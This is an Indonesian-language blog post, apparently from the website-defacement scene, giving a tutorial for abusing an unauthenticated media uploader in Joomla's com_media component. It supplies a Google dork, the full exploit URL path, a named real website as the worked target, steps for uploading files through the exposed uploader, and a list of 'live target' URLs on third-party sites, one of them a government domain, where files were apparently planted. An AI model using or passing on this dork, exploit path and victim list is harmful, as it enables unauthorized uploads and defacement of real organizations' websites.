Kali ini saya mau membahas mengenai Teknik Exploit Joomla yang memiliki Vulnerabilitas pada Component Media di CMS Joomla ^_^
Pada penasaran kan gimana caranya :v ?
Oke,, Langsung aja ~
Dork : inurl:option=com_media (Use Your Brain)
Exploit : /index.php?option=com_media&view=images&tmpl=component&fieldid=&e_name=jform_articletext&asset=com_content&author=&folder=
Pertama,, Kamu cari dulu Targetnya di google menggunakan Dork diatas ;)
Dork bisa dikreasikan koq,, heheheh :v
Biar bisa mendapatkan Target yang Fresh gitu :v :v
Disini saya sudah menyiapkan Targetnya ~
http://www.vermontjfc.com.au
Nah ~
Kamu tinggal tambahin aja dengan Exploit yang ada Diatas, Jadinya begini ~
http://www.vermontjfc.com.au/index.php?option=com_media&view=images&tmpl=component&fieldid=&e_name=jform_articletext&asset=com_content&author=&folder=
Udah munculkan Bugnya ~
Sekarang kamu tinggal Upload File yang diinginkan dibagian Uploader ~
Note : File yang bisa diupload ber-extensikan .txt .jpg .gif .png ...
Kalau .html atau .php sepertinya tidak bisa :v
Nah~
Kalau kamu sudah meng-Upload File silahkan lihat hasilnya disini ~
contoh : http://www.vermontjfc.com.au/images/Via.jpg
Tara ~
Bisa kan :p tinggal disubmit aja deh hasil Upload-an kamu :v :v
Udah dulu ya,, Semoga Bermamfaat ^_^
Live Target ~
http://www.truenorthpower.com/images/SaktiaOktapyani.jpeg
http://www.stillbrookrecords.com/images/SaktiaOktapyani.jpeg
http://www.asilomanila.com/images/SaktiaOktapyani.jpeg
http://www.reach.org.uk/images/SaktiaOktapyani.jpeg
http://rakhinethargree.com/images/SaktiaOktapyani.jpeg
http://www.backyardbarandgrille.com/images/SaktiaOktapyani.jpeg
http://www.photodestination.co.za/images/Via.jpg
http://www.vermontjfc.com.au/images/Via.jpg
http://pn-sleman.go.id/images/Via.jpg
http://www.calgarybridge.org/images/SaktiaOktapyani.jpeg
http://partalistinn.is/images/SaktiaOktapyani.jpeg
http://www.polomagazines.com/images/SaktiaOktapyani.jpeg
http://www.softouchconcepts.com/images/SaktiaOktapyani.jpeg
0 comments:
Post a Comment